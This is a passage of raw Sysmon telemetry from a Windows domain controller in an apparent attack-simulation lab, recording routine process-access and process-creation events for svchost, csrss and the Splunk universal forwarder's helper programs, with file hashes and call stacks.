10341000x80000000000000007268Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:45.419{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007267Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:45.419{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007266Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:45.419{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007265Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:45.419{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-91BD-6005-0A03-00000000A301}4448C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007264Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:45.419{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-91BD-6005-0A03-00000000A301}4448C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007263Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:45.419{59A5CD1D-91BD-6005-0A03-00000000A301}4448C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000007289Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:46.091{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-91BE-6005-0B03-00000000A301}4700C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007288Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:46.091{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007287Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:46.091{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007286Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:46.091{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007285Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:46.091{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007284Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:46.091{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007283Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:46.091{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007282Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:46.091{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007281Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:46.091{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007280Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:46.091{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007279Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:46.091{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-91BE-6005-0B03-00000000A301}4700C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007278Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:46.091{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-91BE-6005-0B03-00000000A301}4700C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007277Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:46.091{59A5CD1D-91BE-6005-0B03-00000000A301}4700C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000007303Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:47.419{59A5CD1D-91BF-6005-0C03-00000000A301}47404776C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007302Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:47.278{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-91BF-6005-0C03-00000000A301}4740C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007301Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:47.278{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007300Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:47.278{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007299Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:47.278{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007298Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:47.278{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007297Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:48:47.278{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007296Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 